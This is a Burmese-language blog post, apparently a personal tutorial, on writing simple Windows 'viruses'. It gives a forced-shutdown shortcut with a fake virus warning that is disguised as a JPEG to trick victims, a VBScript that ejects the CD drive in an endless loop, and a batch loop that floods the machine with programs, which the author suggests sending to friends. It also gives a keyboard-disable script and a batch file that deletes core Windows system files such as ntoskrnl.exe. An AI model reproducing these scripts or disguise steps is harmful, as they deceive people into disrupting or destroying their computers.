လြယ္ကူေသာ Virus ေရးနည္း
က်ြန္ေတာ့လက္ထဲမွာတင္ဒီေကာင္ေလးကိုသိတာေတာ္ေတာ္ေတာ့ၾကာေနပါျပီ ။က်ြန္ေတာ္လည္း ကိုညီေနမင္းဆိသြားၾကည့္လိုက္ တျခားဆိုဒ္ေတြမွာလိုက္ရွာလိုက္ နဲ ့ေလ့လာလိုက္နဲ ့ဘယ္ကေနရမွန္းေတာင္မမွတ္မိေတာ့ပါဘူး။က်ြန္ေတာ္လည္းစိတ္၀င္စားလို ့ေသေသခ်ာခ်ာေတာ့ေလ့လာျဖစ္မိတယ္။တအားၾကီးမာတဲ ့ဗိုင္းရပ္ေလာက္ေတာ့လည္းမေရးရဲပါဘူး အရင္ဆံုးကိုယ္တိုင္ကစမ္းၾကည့္တာ ဆိုေတာ့တျခားသူကိုလည္းမထိခိုက္ေစခ်င္လို့ပါ။ေတာ္ေတာ္မ်ားမ်ာ; shutdown virus ကိုျမင္ဖူးက်မွာပါ။အရင္ဆံုး desktop ေပၚမွာ right click ေထာက္ျပီး new-shortcut ကိုယူပါတယ္New shortcut ဆိုတဲ႔ icon နဲ႔ အတူ Creat shortcut ဆိုတဲ႔ box ေပၚလာပါတယ္။ Text box ေနရာေလးမွာ ဒါေလးကို ႐ိုက္ထည္႔ေပးပါ ။ (space ျခားတာ မွန္ဖို႔ အဓိကက်ပါတယ္ခင္ဗ်ာ။)
...shutdown -s -t 60 -c “WARNING a virus has been detected on your computer, emergency shutdown initiated”
(space bar ကိုမွန္ေအာင္ျခားဖို ့ေတာ့လိုပါတယ္။အဲ ့မွာ 60 ကေတာ့ ဘယ္အခ်ိန္ေလာက္မွာ shutdownက်ေစခ်င္လည္းဆိုတာကို
ေျပာတာပါ c ဆိုတဲ ့အတြက္ စကၠန္ ့ကိုေျပာတာပါ 60 မၾကိဳက္လို ့ 20 ေပးခ်င္လည္းရပါတယ္။)
Next ႏိွပ္လိုက္ရင္ Select a Tittle for the program ဆိုတဲ႔ box ေပၚပါတယ္။ နာမည္ကို လည္းႀကိဳက္တာေပးပါ။သူကေတာ့ shutdown.exe ဆိုျပီးေပၚတာမ်ားပါတယ္ အဲ ့ဒါဆိုရင္ေတာ့လူတိုင္းသိမွာေပါ့ အဲ့ေၾကာင့္မို ့တျခားနာမည္နဲ ့jpeg နာမည္ကိုေျပာင္း ထားလိုက္တယ္ (styleman.jpeg) ဆိုပါေတာ့။
ဒီလိုေလးေပၚေနပါ့မယ္ အဲ ့ေတာ့ဘယ္သူမွလည္းမရိပ္မိေတာ့ဘူးေပါ့။ျပီးေတာ့ icon ပံုစံေလးကိုလည္းေျပာင္းေပးလိုက္ရင္ ပိုေကာင္းမွာေပါ့။မိမိေပးလိုက္တဲ႔ နာမည္နဲ႔ ေပၚလာတဲ႔ shortcut ေလးကို R-Click လုပ္ၿပီး properties ႏိွပ္ပါတယ္။ Change icon ဆိုတာေလး click ၿပီး icon ေျပာင္းေပးလိုက္ပါ။
ပံုမွန္တဲ ့မတူတဲ ့ icon ဆိုရင္ေတာ႔ ဘယ္သူ ဖြင္႔ ၾကည္႔ ပါ႔မလဲ ။ က်ေနာ္ကေတာ႔JPEG iconေလးပဲ ေရြးလိုက္ပါတယ္။ Desktop ေပၚမွာ photo ေလးတစ္ခု အတိုင္းျဖစ္ေနပါတယ္။ အဲ့ ဒါေလးကို double click
လိုက္တာနဲ ့စကၠန္ ့၆၀ (ကိုယ္ေပးထားတဲ ့အခ်ိန္မွာ)shut down က်သြားပါျပီ။ မသိရင္ေတာ႔ ဘာမွကိုလုပ္မရျဖစ္သြားေရာ။ ဘယ္ေနရာမွ လည္း ႏွိပ္ လို႔ မရဘူး၊ ဘာနဲ႔ မွလည္း ပိတ္လို႔မရပါဘူး ။ ဒါဆို ဒီအတိုင္း shutdown က်သြားတာကို ထိုင္ၾကည္႔ေနရေကာ။အဲ ့ဒါကိုျပန္လုပ္တာမခက္ပါဘူး run ေလးကို ေခၚၿပီး shutdown -a လို႔ သတ္မွတ္ခ်ိန္ မျပည္႔ ခင္ေလးမွာ ႐ိုက္ထည္႔ၿပီး enter ေခါက္လိုက္ပါ။ shutdown virus ျပန္ပိတ္သြား ပါလိမ္႔မယ္။
အဆင္ေျပပါတယ္။စမ္းၾကည္႔ႏိုင္ပါတယ္ အႏ ၱရာယ္ကင္းပါတယ္။ အဲ ့ဒါတင္ပဲလားဆိုေတာ့မဟုတ္ပါဘူး အပၚကေရးတဲ ့ စာသားကိုျပန္ေျပာျပပါမယ္
shutdown -s -t 60 -c “WARNING a virus has been detected on your computer, emergency shutdown initiated”
အကယ္လို ့ကိုယ္က restart ခ်ခ်င္တယ္ဆိုရင္လည္း
shutdown.exe –s –t 60 ေနရာမွာ shutdown.exe –r –t 60 ဆိုျပီး အစားသြင္းလိုက္ယံုပါပဲ ေနာက္ကစာသားေတြမွာလည္း ကိုယ္ၾကိဳက္သလို သတိေပးခ်င္သလိုစာသားမ်ားကို ေရးေပးႏိုင္ပါတယ္။ ေကာ္မာအဖြင့္အပိတ္ေတာ့မွန္ေအာင္လုပ္ေပါ့။ရီစတက္တင္မဟုတ္ပါဘူး တျခားေသာ sleep ေကာ log off ေကာ္အသံုးျပဳလို့ရပါတယ္။
ဒီေကာင္ေလးကေတာ့ စီဒီဒရိုက္ကို ပြင့္ပိတ္လုပ္ေပးေနပါလိမ့္မယ္
ဒါေလးကိုကူးလိုက္ပါ new document ထဲကိုကူးလိုက္ျပီးရင္
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
ေလးကို vbs နဲ့ၾကိဳက္တဲ ့နာမည္ေပးျပီး save လိုက္ပါ all file ျဖစ္ဖို ့လိုပါတယ္ ျပီးရင္ျပန္ေျဖဖို ့အတြက္ shift +ctrl+esc ကိုႏွိပ္ wsricrite.exe ကို end process ေပးလိုက္ပါဒါမွမဟုတ္ရင္စီဒီဒရိုက္ကဆက္တိုက္အဖြင့္အပိတ္လုပ္ေနမွာမလို ့ပါ။
Task manager >> processes ထဲက wsricrite.exe ေလးကိုေျပာတာပါ။
ဒီေကာင္ေလးကေတာ့ေပ်ာ္စရာေလးပါ ။ဒီဗိုင္းရပ္ေလးကိုရမ္းျပီးရင္ ဘာ key နဲ့မွလည္းပိတ္လိုက္လို့မရဘူးထင္တာပါပဲ။
ဘာမွလည္းလုပ္လို့ မရပါဘူး။လံုး၀စက္ကို restart ခ်လိုက္မွရပါမယ္။ဒါေပမဲ့ စက္ရဲ ့မည္သည့္အစိတ္အပိုင္း
ကိုမွ ထိခိုက္ျခင္းမရွိပါ။ေအာက္မွာေပးထားတဲ ့စာေတြကိုကူးျပီး notepad(or)text document မွာကူးျပီးထည့္လိုက္ပါ။
@echo off
:A
start dir
start command
start firefox
start explorer
start notepad
goto:A
သေဘာကေတာ့ကြန္ပ်ဴတာကိုအလုပ္ေပးထားခိုင္းတဲ့ပံုစံလို ့ထင္တာပါပဲ ခိုင္းတာပဲရွိျပီး ျပန္နားခိုင္းတာမရွိဘူးေလ။အဲ့ဒါေလးကို notepad နဲ့ေ၇းျပီး .bat file အေနနဲ ့သိမ္းျပီး run ၾကည့္ပါ။.bat file ဆိုတာက styleman.bat လို
မ်ိဳးေနာက္က ဖိုင္ type ကို bat ဖိုင္ေျပာင္းခိုင္းတာကိုေျပာတာပါ။ဘာမွလည္းမခက္ပါဘူး။ပိုျပီးအဆင္ေျပေအာင္
ဓါတ္ပံုေလးနဲ့ပါျပထားပါတယ္ ပိုလြယ္ကူတာေပါ့။အဲ့လိုေရးျပိးတာနဲ ့double ကလစ္ျပီးစမ္းၾကည့္ပါ ေတာ္ေတာ္
ေလးကိုလွပါတယ္ သူငယ္ခ်င္းေတြဆီကိုလည္း ပို ့လို ့ရတာေပါ့ စက္ကိုဘာမွထိခိုက္ျခင္းမရွိပါ။restart ခ်လိုက္
ရင္အိုေကပါျပီ။ပညာတစ္ခုကိုေတာ့သိခ်င္ရင္ောတ့စမ္းၾကည့္တာအေကာင္းဆံုးပါပဲ။
ေနာက္တစ္ခုက Keyboard Disable လုပ္တဲ ့ virus ေလးပါ
@echo off
Title Error
Rundll32.exe keyboard.dll,disable
ျပီးရင္ေတာ့ .bat file နဲ ့ေဆ့လိုက္ပါ။အစကအရမ္းအေရးၾကိးျပီး အႏၵရယ္၇ွိတဲ ့ virus ေရးနည္းပါဗဟုသုတအေနနဲ့ေ၇းေပးအံုးမလို့ပဲ ေနာက္မွတစ္ခုခုျဖစ္မွာစိုးတဲ့အတြက္မေရးျပေတာ့ဘူး ေနာက္မွပဲေဖာ္ျပပါေတာ့မယ္။
ဥပမာအေနေလာက္ဆိုရင္ေတာ့
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe" ဒီဖိုင္ေတြကို bat ျဖစ္ျဖစ္ exe နဲ ့ျဖစ္ျဖစ္ေဆ့လိုက္ရင္ရပါျပီ။
ဒါေပမဲ ့ဒိေကာင္သည္တကယ့္ကိုအႏၱရယ္၇ွိတဲ့ဗိုင္းရပ္ပါ။စမ္းသပ္ရန္အဖို ့မဟုတ္သလို တစ္ေယာက္ေယာက္ကိုေနာက္ရန္အတြက္လည္းမဟုတ္ပါခင္ဗ်ာ။သိရံုေလာက္အေနအထားေလာက္ပါပဲခင္ဗ်ာ။
ဗိုင္းရပ္ bat ပဲျဖစ္ျဖစ္ exe ပဲျဖစ္ျဖစ္ သူမွာ open with မပါပါဘူး run ပဲပါပါတယ္။bat ဖိုင္ကို notepad ကိုဖြင့္ျပီး bat ဗိုင္းရပ္ေလးကိုပစ္ထည့္လိုက္တာနဲ ့သူေရးထားတဲ ့အတိုင္းအကုန္ေပၚပါတယ္။ right click ေထာက္ျပီး edit notepad နဲ ့လည္းၾကည့္လို ့ရပါတယ္ခင္ဗ်ာ။ဖိုင္တစ္ခုကိုရမ္းရမွာေၾကာက္တယ္ဆိုတဲ ့fri ေတြအဆင္ေျပေအာင္လို ့ပါ။
ပို ့စ္ရွည္ေနမွာစိုးလို ့ virus ေရးတဲ ့လမ္းေၾကာင္းနဲ ့ေျဖရွင္းနည္းကိုေနာက္မွဆက္ေရးပါမယ္...။
အမွန္ဆိုအရင္ေျပာျပေပးခဲ ့တဲ ့လူကိုေဖာ္ျပေပးမလို ့ပါပဲ။အဲ့ဒိအကိုကဘယ္သူမွန္းစဥ္းစားမရလို ့။က်ြန္ေတာ္လည္း လိုက္ျပိးေလွ်ာက္ၾကည့္လိုက္စမ္းလိုက္ကမ်ားလို ့ မေျပာေပးနိုင္ပါဘူး။ဘာပဲျဖစ္ျဖစ္ေက်းဇူးတင္ပါတယ္။ဟိုတစ္ေ န ့ကညီေလးတစ္ေယာက္ေျပာတာနဲ ့မွတ္မိတာေလးခ်ေရးလိုက္တာ။ေနာက္ထပ္ အမ်ားၾကိးေတာ့ရ်ိပါေသးတယ္။သူငယ္ခ်င္းေတြေမးၾက
တာေလးေတြနဲ ့မၾကံဳေတာ့ ဘာေရးရမွန္းမသိဘူး။ေမးတဲ ့လူနဲ ့ၾကံဳမွပဲမွတ္ထားတာေလးျပန္ခ်ျပေပးပါေတာ့မယ္။ေနာက္တစ္ခုက က်ြ္နေတာ္က အေရးအသားညံ့တယ္ ျပီးေတာ့ျမန္မာေဖာင့္ကိုက်ြမ္းက်င္စြာလည္းမရဘူး အဲ့ဒါေၾကာင့္အမွၾးပါရင္ခြင့္လြတ္ပါ။အရင္က လင့္ေတြလုပ္ထားတာေတာ့ရွိတယ္ လာတဲ့လူေတြမ်ားတာနဲ ့ဖ်က္လိုက္တာ။အခုေတာင္ကိုယ္ပိုင္မွတ္စုေလးအေနနဲ ့ပို ့စ္ေလးေတြကို
တင္ထားာကည့္လို္က္တာ။
က်ြန္ေတာ္ဆီကိုလာလည္လို ့ဖတ္မိသူမ်ားကိုေက်းဇူးတင္ပါတယ္ခင္ဗ်ာ......